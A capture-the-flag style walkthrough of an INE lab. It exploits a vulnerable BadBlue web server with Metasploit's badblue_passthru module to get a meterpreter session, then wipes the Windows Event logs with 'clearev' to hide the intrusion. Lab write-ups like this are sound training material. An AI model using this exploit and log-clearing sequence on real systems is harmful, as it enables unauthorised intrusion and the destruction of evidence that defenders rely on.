Hii all!

Welcome to our Clearing Windows Event Logs lab.

Description

Clearing tracks after exploiting a system is a crucial step for attackers who want to avoid detection and maintain access. Metasploit, a popular framework for developing and executing exploit code against a remote target machine, also includes techniques that can be used to cover tracks after an exploit.

Lab Environment In this lab environment, you will be provided with GUI access to a Kali machine and a target Windows machine. The target machine running a vulnerable application will be accessible at demo.ine.local.

Objective: Your task is to exploit the vulnerable application and then clear the Windows Event logs with Metasploit.

Tools

The best tools for this lab are:

Nmap Metasploit Framework

Step 1: In this open the lab link to access the Kali machine.

None

Step 2: In this step check if the target machine is reachable:

Command:

ping -c 4 demo.ine.local
None

The target is reachable.

Step 3: In this step run an nmap scan against the target:

Command:

nmap -sV demo.ine.local
None

Step 4: In this step gaining access.

The target system has a vulnerable version of BadBlue running on port 80 that can be exploited through the use of a Metasploit module.

In order to use this exploit module, we will need to start up the Metasploit Framework Console (msfconsole), this can be done by running the following command:

Command:

msfconsole
None

After starting msfconsole, we can load the module by running the following command:

Command:

use exploit/windows/http/badblue_passthru
None

We will now need to configure the module options, more specifically, we will need to set the target. This can be done by running the following command:

Command:

set RHOSTS demo.ine.local
None

After configuring the module options, we can execute the exploit module by running the following command:

Command:

exploit

As shown in the following screenshot, the exploit module runs successfully and provides us with a meterpreter session on the target system.

None

Now that we have gained access to the Windows target system, we can explore the process of clearing our tracks on the Windows target system.

Step 5: Clearing Windows Event logs.

Whenever you successfully gain access to a Windows target, all of your activity is being logged in the form of Windows events. Meterpreter provides you with the ability to clear the entire Windows Event log. This can be done by running the following command:

Command:

clearev

As shown in the following screenshot, meterpreter clears the Windows Event log.

None

Thankyou for Reading! HappyCTFHacking!